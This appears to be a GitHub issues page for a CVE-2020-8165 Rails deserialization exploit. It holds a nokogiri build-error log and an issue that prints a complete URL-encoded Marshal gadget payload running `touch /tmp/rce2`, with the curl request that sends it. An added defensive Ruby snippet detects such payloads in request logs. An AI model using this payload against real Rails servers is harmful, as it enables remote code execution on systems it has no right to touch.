cve-2020-8165's Introduction

cve-2020-8165's Issues

An error occurred while installing nokogiri (1.10.9), and Bundler cannot continue.

I tried to install and received the following error message:
Gem::Ext::BuildError: ERROR: Failed to build gem native extension.

current directory:
/root/Tools/CVE-2020-8165/vendor/bundle/ruby/2.7.0/gems/nokogiri-1.10.9/ext/nokogiri
/usr/bin/ruby2.7 -I /usr/lib/ruby/2.7.0 -r ./siteconf20201130-4800-ae9ah6.rb
extconf.rb
checking if the C compiler accepts ... *** extconf.rb failed ***
Could not create Makefile due to some reason, probably lack of necessary
libraries and/or headers. Check the mkmf.log file for more details. You may
need configuration options.

Provided configuration options:
--with-opt-dir
--without-opt-dir
--with-opt-include
--without-opt-include=${opt-dir}/include
--with-opt-lib
--without-opt-lib=${opt-dir}/lib
--with-make-prog
--without-make-prog
--srcdir=.
--curdir
--ruby=/usr/bin/$(RUBY_BASE_NAME)2.7
--help
--clean
/usr/lib/ruby/2.7.0/mkmf.rb:471:in `try_do': The compiler failed to generate an executable file. (RuntimeError)
You have to install development tools first.
from /usr/lib/ruby/2.7.0/mkmf.rb:597:in `block in try_compile'
from /usr/lib/ruby/2.7.0/mkmf.rb:544:in `with_werror'
from /usr/lib/ruby/2.7.0/mkmf.rb:597:in `try_compile'
from extconf.rb:138:in `nokogiri_try_compile'
from extconf.rb:162:in `block in add_cflags'
from /usr/lib/ruby/2.7.0/mkmf.rb:655:in `with_cflags'
from extconf.rb:161:in `add_cflags'
from extconf.rb:416:in `<main>'

To see why this extension failed to compile, please check the mkmf.log which can
be found here:

/root/Tools/CVE-2020-8165/vendor/bundle/ruby/2.7.0/extensions/x86_64-linux/2.7.0/nokogiri-1.10.9/mkmf.log

extconf failed, exit code 1

Gem files will remain installed in
/root/Tools/CVE-2020-8165/vendor/bundle/ruby/2.7.0/gems/nokogiri-1.10.9 for
inspection.
Results logged to
/root/Tools/CVE-2020-8165/vendor/bundle/ruby/2.7.0/extensions/x86_64-linux/2.7.0/nokogiri-1.10.9/gem_make.out

An error occurred while installing nokogiri (1.10.9), and Bundler
cannot continue.
Make sure that gem install nokogiri -v '1.10.9' --source 'https://rubygems.org/' succeeds before bundling.

In Gemfile:
rails was resolved to 5.2.3, which depends on
actioncable was resolved to 5.2.3, which depends on
actionpack was resolved to 5.2.3, which depends on
actionview was resolved to 5.2.3, which depends on
rails-dom-testing was resolved to 2.0.3, which depends on
nokogiri

gem_make.out OUTPUT:

current directory: /root/Tools/CVE-2020-8165/vendor/bundle/ruby/2.7.0/gems/nokog
iri-1.10.9/ext/nokogiri
/usr/bin/ruby2.7 -I /usr/lib/ruby/2.7.0 -r ./siteconf20201130-4800-ae9ah6.rb ext
conf.rb
checking if the C compiler accepts ... *** extconf.rb failed ***
Could not create Makefile due to some reason, probably lack of necessary
libraries and/or headers. Check the mkmf.log file for more details. You may
need configuration options.

Provided configuration options:
--with-opt-dir
--without-opt-dir
--with-opt-include
--without-opt-include=${opt-dir}/include
--with-opt-lib
--without-opt-lib=${opt-dir}/lib
--with-make-prog
--without-make-prog
--srcdir=.
--curdir
--ruby=/usr/bin/$(RUBY_BASE_NAME)2.7
--help
--clean
/usr/lib/ruby/2.7.0/mkmf.rb:471:in `try_do': The compiler failed to generate an executable file. (RuntimeError)
You have to install development tools first.
from /usr/lib/ruby/2.7.0/mkmf.rb:597:in `block in try_compile'
from /usr/lib/ruby/2.7.0/mkmf.rb:544:in `with_werror'
from /usr/lib/ruby/2.7.0/mkmf.rb:597:in `try_compile'
from extconf.rb:138:in `nokogiri_try_compile'
from extconf.rb:162:in `block in add_cflags'
from /usr/lib/ruby/2.7.0/mkmf.rb:655:in `with_cflags'
from extconf.rb:161:in `add_cflags'
from extconf.rb:416:in `<main>'

To see why this extension failed to compile, please check the mkmf.log which can
be found here:

/root/Tools/CVE-2020-8165/vendor/bundle/ruby/2.7.0/extensions/x86_64-linux/2.7
.0/nokogiri-1.10.9/mkmf.log

extconf failed, exit code 1

mkmf.log OUTPUT:

"x86_64-linux-gnu-gcc -o conftest -I/usr/include/x86_64-linux-gnu/ruby-2.7.0 -I/
usr/include/ruby-2.7.0/ruby/backward -I/usr/include/ruby-2.7.0 -I. -Wdate-time -
D_FORTIFY_SOURCE=2 -g -O2 -fdebug-prefix-map=/build/ruby2.7-PnoFQD/ruby2.7-2.7
.2=. -fstack-protector-strong -Wformat -Werror=format-security -fPIC conftest.c
-L. -L/usr/lib/x86_64-linux-gnu -L. -Wl,-z,relro -Wl,-z,now -fstack-protector-
strong -rdynamic -Wl,-export-dynamic -lruby-2.7 -lm -lc "
checked program was:
/* begin */
1: #include "ruby.h"
2:
3: int main(int argc, char **argv)
4: {
5: return !!argv[argc];
6: }
/* end */

Any assistance would be appreciated.

Cannot execute other commands?

Hi,

I am able to use the provided exploit code to create the /tmp/rce file, by running the curl command twice.
However, I cannot modify the code to create other files or run other commands.

I changed the code touch /tmp/rce to touch /tmp/rce2 and ran the rest of the Ruby code in the same way.

From this, I generated the payload %04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22%16%60touch+%2Ftmp%2Frce2%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T

And ran the request curl 'localhost:3000/users?new=%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22%16%60touch+%2Ftmp%2Frce2%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T' twice.

However, this did not create a new file /tmp/rce2. I am also not able to successfully run any other commands, such as rm, echo 'x' > /tmp/rce, or ping.

Do you have any advice on why this is not working?

Thank you!
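
For defenders reviewing request logs: the parameter value quoted in this issue begins with %04%08, the two-byte version header of Ruby's Marshal format, followed by an object tag and a class name. The following is an added example, not part of the issue or of the repository; it flags query parameters that decode to a Marshal stream and reads the top-level class name without ever calling Marshal.load. The function names and the sample request targets are constructed for illustration.

```ruby
require "uri"

MARSHAL_HEADER = "\x04\x08".b   # Marshal format version 4.8
CLASS_TAGS     = "ouUSCe"       # type bytes that are followed by a class/module name symbol

# Read the top-level class name from a Marshal stream without calling
# Marshal.load. Handles only the one-byte length form (names up to 122 bytes).
def marshal_class_name(bytes)
  bytes = bytes.b
  return nil unless bytes.start_with?(MARSHAL_HEADER)
  return nil unless bytes.length >= 5 && CLASS_TAGS.include?(bytes[2]) && bytes[3] == ":"
  len = bytes.getbyte(4) - 5    # small Marshal integers are stored as value + 5
  return nil unless len.between?(1, 122) && bytes.length >= 5 + len
  bytes[5, len]
end

# Return one finding per query parameter whose decoded value is a Marshal
# stream. request_target is the path-plus-query part of a logged request.
def marshal_findings(request_target)
  query = request_target.split("?", 2)[1].to_s
  pairs = begin
    URI.decode_www_form(query, Encoding::BINARY)
  rescue ArgumentError
    []   # query string that cannot be decoded as a form: nothing to inspect
  end
  pairs.select { |_, value| value.b.start_with?(MARSHAL_HEADER) }
       .map { |name, value| { param: name, class_name: marshal_class_name(value) } }
end

# Constructed sample data: a harmless Struct, marshalled and URL-encoded.
Sample = Struct.new(:x)
BENIGN_BLOB = URI.encode_www_form_component(Marshal.dump(Sample.new(1)))
SAMPLE_TARGETS = [
  "/users?page=2&q=ruby+marshal",   # ordinary request, no finding expected
  "/users?new=#{BENIGN_BLOB}",      # parameter carrying a Marshal stream
].freeze

SAMPLE_TARGETS.each do |target|
  marshal_findings(target).each do |finding|
    puts "#{target[0, 40]} -> #{finding.inspect}"
  end
end
```

A class name reported here that the application never expects to receive from a client is the signal worth alerting on.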
